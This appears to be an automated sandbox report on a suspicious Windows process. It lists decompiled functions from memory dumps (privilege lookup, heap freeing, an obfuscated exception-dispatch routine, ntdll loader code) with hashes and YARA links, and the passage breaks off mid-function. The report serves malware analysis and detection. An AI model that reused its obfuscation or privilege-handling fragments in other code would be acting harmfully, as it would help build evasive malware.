LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00418A70

Memory Dump Source

Source File: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp Download File

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 8b359fb7507d5b824c1c203ac476de7c77d35462f8687a4d82fa2e26643e9df4
Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
Opcode Fuzzy Hash: 8b359fb7507d5b824c1c203ac476de7c77d35462f8687a4d82fa2e26643e9df4
Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 004188E0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004188E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191D0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004188ef
0x004188f7
0x0041890d
0x00418911

APIs

RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000), ref: 0041890D

Memory Dump Source

Source File: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 5f07ff77701c50d985bdb956e7219805ab9d32c115d1313d9b1efbd7c13c1fb9
Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
Opcode Fuzzy Hash: 5f07ff77701c50d985bdb956e7219805ab9d32c115d1313d9b1efbd7c13c1fb9
Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00408A96, Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00408A96(signed int __eax, signed int __ecx, signed int __edx, void* __edi) {
				struct _EXCEPTION_RECORD _v0;
				signed int _v117;
				signed int _t19;
				intOrPtr _t20;
				signed int _t21;
				signed int _t25;
				void* _t27;
				void* _t31;
				signed int _t34;
				CONTEXT* _t37;
				struct _EXCEPTION_RECORD _t38;

				_t34 = __edx;
				_t33 = __ecx;
				_t19 = __eax ^  *(__edx - 0x4e1eaaad);
				asm("salc");
				asm("int1");
				_v117 = _v117 | __edx;
				_t38 = _v0;
				 *_t38 = 0xffffffff; // executed
				KiUserExceptionDispatcher(_t38, _t37); // executed
				_push(_t38);
				 *(_t38 + 0x10) = _t19;
				_t20 = L00416CF0(_t19);
				 *((intOrPtr*)(_t38 + 8)) = _t20;
				if(_t20 != 0) {
					_t21 = E00408600(_t20, _t33);
					__eflags = _t21 - 0x300;
					 *((char*)(_t38 + 0x34)) = _t21 & 0xffffff00 | _t21 - 0x00000300 > 0x00000000;
					__eflags = E004198E0(E00413D80(_t38, 0x73));
					if(__eflags != 0) {
						_t33 =  *(_t38 + 4);
						_t11 = _t38 + 0x4ac;
						 *_t11 =  *(_t38 + 0x4ac) ^  *(_t38 + 4);
						__eflags =  *_t11;
						 *((char*)(_t38 + 0x33)) = 1;
					}
					_t25 = E00419520(_t33, __eflags, _t38); // executed
					 *(_t38 + 0xc) = _t25;
					__eflags = _t25;
					if(_t25 == 0) {
						goto L2;
					} else {
						_t27 = E00408600(_t25, _t33);
						__eflags = _t27 - 0x300;
						_t16 = _t27 - 0x300 > 0;
						__eflags = _t16;
						 *((char*)(_t38 + 0x35)) = _t34 & 0xffffff00 | _t16;
						E004088C0(_t33, __eflags, _t38); // executed
						E00408250(_t33, __eflags, _t38);
						E004084B0(_t38);
						_t31 = E00408320(__eflags, _t38);
						_push(_t38);
						return L00406CF0(_t31, _t33);
					}
				} else {
					L2:
					return 0;
				}
			}

0x00408a96
0x00408a96
0x00408a96
0x00408a9d
0x00408a9e
0x00408a9f
0x00408aa4
0x00408aa8
0x00408aae
0x00408ab3
0x00408ab4
0x00408ab7
0x00408abf
0x00408ac4
0x00408acb
0x00408ad0
0x00408adb
0x00408aec
0x00408aee
0x00408af0
0x00408af3
0x00408af3
0x00408af3
0x00408af9
0x00408af9
0x00408afe
0x00408b06
0x00408b09
0x00408b0b
0x00000000
0x00408b0d
0x00408b0d
0x00408b12
0x00408b17
0x00408b17
0x00408b1b
0x00408b1e
0x00408b24
0x00408b2a
0x00408b30
0x00408b35
0x00408b40
0x00408b40
0x00408ac6
0x00408ac6
0x00408aca
0x00408aca

APIs

KiUserExceptionDispatcher.NTDLL(?), ref: 00408AAE

Memory Dump Source

Source File: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp Download File

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 75ae0f2ac25b72965644cf07eb60bee5b12e84ed728a14ed666c10a149d2628a
Instruction ID: 4b09065fceea4b0150d9e2cd383749edb1adf611988ffd2895b5ae369b2cbf8b
Opcode Fuzzy Hash: 75ae0f2ac25b72965644cf07eb60bee5b12e84ed728a14ed666c10a149d2628a
Instruction Fuzzy Hash: 38E086314517125ACB105FB9D8018D77FE85E46324304076FE4A5D7541D770D0818B90

Uniqueness

Uniqueness Score: -1.00%

Function 00418920, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418920(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191D0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418923
0x0041893a
0x00418948

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948

Memory Dump Source

Source File: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp Download File

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 16d690d00366790f64957aa77ce23f9f6d13ce44f8906329508bc41397d703fa
Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
Opcode Fuzzy Hash: 16d690d00366790f64957aa77ce23f9f6d13ce44f8906329508bc41397d703fa
Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00527AAA, Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005), ref: 00527AE2

Memory Dump Source

Source File: 0000000F.00000002.786804689.0000000000527000.00000040.00020000.sdmp, Offset: 00527000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: dca0c8da3c8f7be754a844098ed6d735b79edfb88e1888c49a9aa1b7d6db7fb4
Instruction ID: f7e113cbb7bf640c974e575db7c87cdbcd6d42c567f26a6d73ca4760dac92912
Opcode Fuzzy Hash: dca0c8da3c8f7be754a844098ed6d735b79edfb88e1888c49a9aa1b7d6db7fb4
Instruction Fuzzy Hash: 7EE0DF302087298FD700EF20D49CFC67B91BF4B7A2F1A8285DF540B0E293208544CA20

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1EAF8E00, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 126
timeCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E1EAF8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x1ebbd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1ebb8464; // 0x74e10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1ebb5780 & 0x00000003) != 0) {
							E1EB45510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1ebb5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E1EB0B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1ebb7984; // 0x692c30
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1ebb8464; // 0x74e10110
					 *0x1ebbb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E1EAF9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1ebb5780 & 0x00000005) != 0) {
						_push(_t49);
						E1EB45510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x1eaf8e0f
0x1eaf8e16
0x1eaf8e19
0x1eaf8e1b
0x1eaf8e21
0x1eaf8e7f
0x1eaf8e85
0x1eb39354
0x1eb3936c
0x1eb39371
0x1eb3937b
0x1eb39381
0x1eb39381
0x1eb3937b
0x1eaf8e9d
0x1eaf8e9d
0x1eaf8e29
0x1eaf8e2c
0x1eaf8e38
0x1eaf8e3e
0x1eaf8e43
0x1eaf8eb5
0x1eaf8eb9
0x1eb392aa
0x1eb392af
0x1eb392e8
0x1eb392e8
0x1eb392af
0x1eaf8eb9
0x1eaf8e45
0x1eaf8e53
0x1eaf8e5b
0x1eaf8e5f
0x1eaf8e78
0x1eaf8e78
0x1eaf8e7d
0x1eaf8ec3
0x1eaf8ecd
0x1eaf8ed2
0x1eaf8ed2
0x1eaf8ec5
0x1eaf8ec5
0x00000000
0x1eaf8e7d
0x1eaf8e67
0x1eaf8ea4
0x1eb3931a
0x00000000
0x00000000
0x1eb39320
0x1eaf8ea4
0x1eaf8e70
0x1eb39325
0x1eb39340
0x1eb39345
0x1eb39345
0x1eaf8e76
0x00000000
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 1EAF8E53

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1EB3932A
0,i, xrefs: 1EAF8E2C
LdrpFindDllActivationContext, xrefs: 1EB39331, 1EB3935D
Querying the active activation context failed with status 0x%08lx, xrefs: 1EB39357
minkernel\ntdll\ldrsnap.c, xrefs: 1EB3933B, 1EB39367

Memory Dump Source

Source File: 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, Offset: 1EAA0000, based on PE: true

Associated: 0000000F.00000002.790535754.000000001EBBB000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: 0,i$LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3066888582
Opcode ID: e48fbf3450923a08cbb0d9df33459727191ff88dadd67f988ca243a23ae141fc
Instruction ID: 2c7e8a8d440973df9ffccbdf26b15abf52b69f24183c97085723839c3f41e674
Opcode Fuzzy Hash: e48fbf3450923a08cbb0d9df33459727191ff88dadd67f988ca243a23ae141fc
Instruction Fuzzy Hash: 60412332E10372DFDB21AB15CCB8A6EF6B6BB40244F06876AF95557150E770EC80C289

Uniqueness

Uniqueness Score: -1.00%

Function 1EADD5E0, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 353
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E1EADD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x1ebbd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E1EAD6600(0x1ebb52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1ebb7b9c; // 0x0
							_t281 = L1EAE4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E1EB0F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1ebb7b90; // 0x775e0000
								if(_t384 == 0) {
									_t353 =  *0x1ebb7b8c; // 0x692b48
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E1EAE2280(_t200, 0x1ebb84d8);
									_t277 =  *0x1ebb85f4; // 0x693038
									_t351 =  *0x1ebb85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x692fd0
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E1EADFFB0(_t287, _t353, 0x1ebb84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E1EB1CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E1EAD6600(0x1ebb52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E1EAD7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x1ebbb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E1EB4E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1ebb8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x1ebbb218; // 0x476f9370
														asm("ror edi, cl");
														 *0x1ebbb1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E1EAE2280(_t250, 0x1ebb84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L1EB03898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E1EADFFB0(_t293, _t353, 0x1ebb84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E1EB037F5(_t353, 0);
																}
																E1EB00413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E1EAF9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E1EAF02D6(_t174);
																}
																L1EAE77F0( *0x1ebb7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E1EAFC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L1EADEC7F(_t353);
										L1EAF19B8(_t287, 0, _t353, 0);
										_t200 = E1EACF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L1EAE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E1EB0B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x1ebbb2f8; // 0x0
									if((_t206 |  *0x1ebbb2fc) == 0 || ( *0x1ebbb2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x1ebbb2ec; // 0x0
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E1EB76B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E1EB76AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E1EADE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L1EADEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E1EB09730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E1EADE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L1EAD8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E1EB03C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
